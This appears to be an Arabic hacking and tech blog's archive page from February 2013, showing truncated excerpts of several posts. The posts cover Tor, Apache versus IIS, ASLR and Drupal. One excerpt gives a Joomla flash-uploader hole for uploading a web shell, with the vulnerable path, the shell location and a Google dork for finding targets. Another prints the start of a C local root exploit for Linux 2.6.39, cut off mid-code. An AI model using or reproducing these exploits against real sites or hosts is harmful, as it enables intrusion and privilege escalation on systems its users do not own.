المشاركات

عرض المشاركات من فبراير, 2013

إيجاد ثغرة في منتديات أحلى منتدى

صورة
السلام عليكم ورحمة الله وبركاته اليوم بصراحة كان يوما صعبا جدا.. خصوصا المساء... فبعد صلاة المغرب تطورت الامور بشكل سريع لدرجة انني فقد تركيزي على كل شيء نظرا لبعض الامور التي حدثت فجأة.. لكن وبحمد الله بعد بضع دقائق قليلة تطورت الامور بشكل أسرع لتصبح في قمة الإيجابية.. أنا هنا لا أتحدث عن المجال المعلوماتي ولا عن الثغرة ولكنني أتحدث عن نفسي.. وبعدما هدأت ورجع لي تركيزي وخذت مكالمة طمأنتني على بعض أموري التي كانت تقلقني قررت أن أجلس أمام الحاسب لأعمل خطة عمل خاصة بالأيام القليلة المتبقية في هذا الشهر (خصوصا بعد تسلمي لكود دفعة اموالي من جوجل أدسنس... فقد حان موعد الخطة الاخيرة في الشهر كما تعودت عمل ذلك في نهاية كل شهر.. ) بعد جلوسي مباشرة وبعدما تيقنت أن الكثير من الأدوات التي قمت بعملها لا يمكنني الاعتماد عليها خصوصا ان بعض السيرفرات لم تعد تعمل بكفاءة كما كانت من قبل.. قررت أن اخذ مغامرة بسيطة مع سيرفرات شركة أحلى منتدى (وللإشارة انني هنا اقصد الشركة الام بالكامل وليس فقط الفرع العربي.. اي forumotion  و forumactif .. إلخ ) وبالفعل... تحقق ما لم يكن بالامكان... حيث أمكنني إستغلال …

ثغرة تحميل ملفات في سكريبت جوملا (ثغرة ابلود) - shell uploder bugs

صورة
السلام عليكم ورحمة الله هذه ثغرة في سكريبت جوملا تمكن المخترق من رفع ملفات غير مرغوب فيها ( شل مثلا) :
http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf  مسار الملف : في حالة رفع شل فهو طبعا إما jpg او php http://localhost//images/stories/shell.php 
بالنسبة لعشاق العم جوجل فيمكنهم البحث عن طريق هذا الدورك :


inurl:index.php?option=com_joomla_flash_uploader 

لمن يستخدمون السكريبت : الترقيع موجود في الموقع الرسمي :)
في أمان الله :)

توضيحات بخصوص اساليب التخفي - The Onion Router

صورة
بسم الله الرحمن الرحيم  يظن البعض بإستخدامه بعض خدمات التخفي على الشبكة من أشهرها البروكسيات على الخوادم الأجنبية أو شبكة “The Onion Router” المعروفة بإ سم Tor بأن بياناته محصنة ولايمكن كشفها لاسيما بأن أغلب موفري هذه الخدمة يضمنوا درجة تشفيرها ضد الكسر وكشف البيانات. في الحقيقة يفشل أغلب الناس في فهم آلية عمل هذه الأنظمة مما يؤدي لكشف هذه البيانات عبر شخص آخر ربما يكون أخطر من مزود الخدمة نفسه.
اولا لمن لم يستخدم شبكة تور من قبل، هذه خطوات تثبيت متصفح تور من أجل إستخدامها، على السريع:

تحميل متصفح تور من الموقع الرسمي:
https://www.torproject.org/download/download.html.en



تثبيت متصفح تور في الجهاز





إعدادات الحماية في شبكة تور







يسألني البعض, هل ذلك يعني بأن هذه الخدمات لاتقوم بحفظ خصوصية مستخدميها؟

الإجابة: نعم ولا, فعندما قلت نعم هي تقوم فعلاً بتجاوز مراقبة مزود الخدمة ومراقبة الشبكة المحلية في حال كان المستخدم يستخدم شبكة داخلية لشركة أو مؤسسة أو شبكة عامة أو أياً كان, فعلى سبيل المثال لو كان هنالك مستخدم يستخدم TOR لإخفاء سجلات التصفح والإتصال الخاصة به فهذه الخدمة تعد من أفضل…

apache vs iis - مقارنة ميزات وعيوب اباتشي و إيس

صورة
Apache HTTP Server



المميزات : مجاني ، ذو مصدر مفتوح ، قابل للتوسعه عن طريق الماجولات .


العيوب : الدعم المحدود ، عدم وجود الـ SSL في النسخة الأم ،


يحتاج إلى المهارة !


الاباتشي برنامج سيرفر قديم و موفق و محبوب لأقصى درجة


إلى درجة انه على إحصائيات شركة Net craft اكثر من نصف مواقع الإنترنت تستخدم هذا السيرفر .



نسبة كبيرة من نجاح هذا السيرفر تعود إلى شهرة البرنامج القديمة


بين المستضيفين للمواقع و مقدمي خدمات الإنترنت ISP


تتواجد نسخ كثيرة له تتناسب مع أنظمة تشغيل مختلفة


مثل الويندوز و الماك و OS X و اليونيكس .



و من ميزاته القوية هو انه مصمم على الماجولار:


أي انه يمكنك إضافة باقات أخرى له لكي ترفع من أداه


بدون الحاجة إلى تغير أشياء معقدة في اصل البرنامج .


يمكنك تحميل النسخة الأم مجانا من موقع


www.apache.org


و لكن ميزاتها محدودة و يجب عليك إضافة بقية الباقات


و الإضافات لك تستفيد من بقية الامتيازات للـ SSL .


و يمكنك شراء النسخة التجارية منه من شركة رد هات بقيمة 995 دولار اسمه :


Secure Web Server 3 Stronghold


و المفيد من هذا التصميم للاباتشي انك ستضيف الأشياء التي تحتاج لها فعلا


و ستترك الأ…

بنية الذاكرة الإفتراضية و حماية ASLR

صورة
السلام عليكم ورحمة الله وبركاته





كود high.c #include<stdio.h> #include<stdlib.h> int mulp(int a ,int b) { int c;         c = a * b; return c; } main(int argc,char**argv) { int x =0, y =0,  z =0; printf("Enter the first number : "); scanf("%d",&x); printf("Enter the second number : "); scanf("%d",&y);         z = mulp(x,y); printf("%d*%d = %d\n",x, y, z); exit(0); } #include<stdio.h>
#include<stdlib.h>

int mulp(int a , int b)
{
        int c;

        c = a * b;

        return c;
}


main(int argc, char **argv)

{

        int x = 0, y = 0,  z = 0;

        printf("Enter the first number : ");
        scanf("%d", &x);

        printf("Enter the second number : ");
        scanf("%d", &y);

        z = mulp(x,y);

        printf("%d*%d = %d\n",x, y, z);


        exit(0);

}
://pastebin.com/LW3 بنية الذاكرة الإفتراضية


*) كل عملية (process) تحمل في نفس المكان للذاكرة الإفتراضية بغض النظر عن …

نظام إدارة المواقع الرائع دروبال - drupal

صورة
السلام عليكم ورحمة الله وبركاته


"دروبال" هو نظام إدارة محتوى Content Managment System (و ليس مجرد نظام مدونات كما يظن البعض)... وفيما يلي موضوع موجز عن هذا النظام الرائع :)

مقدمة عن دروبال مقتبسه من ويكيبيديا(الموسوعة الحرة):

تكتب بالعربية (دروبال)، وهي تعريب لفظي للإسم الإنجليزي Drupal، الذي أتى بدوره من الهولندية Druppel، والتي تعني بالعربية قطرة كما في "قطرة ماء".

نظام إدارة المحتوى :
يحتوي دروبال على بذرة اساسية، أو ما يمكن أن يسمى بقلب النظامCore. يدعم قلب النظام إضافة دوال برمجية تكتب خصيصا لتتوافق مع النظام. توفر هذه الدوال إمكانيات إضافية عديدة, منها: إمكانية إضافة أنظمة للتجارة الإليكترونية، و ألبومات الصور، وأنظمة إدارة القوائم البريدية، والدمج مع CVS.

إن تصميم نظام الدوال البرمجية في دروبال، بالإضافة إلى قاعدة الشيفرات الموثقة جيداً يجعلان من الأسهل بمكان على الأشخاص ذوي المعرفة بلغة بي إتش بي أن يكتبوا شيفرات تضيف مزايا جديدة للبرنامج. يستخدم البرنامج بكثرة في بناء المواقع التي تركز على مجموعات المستخدمين.

دعم اللغة العربية :

يدعم نظام دروبال اللغة…

لوكال روت 2.6.39 - localroot

صورة
السلام عليكم ورحمة الله وبركاته.. كما في العنوان.. (مكتوب بالسي) :
 إليكم الكود :

#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];

    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;

    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof …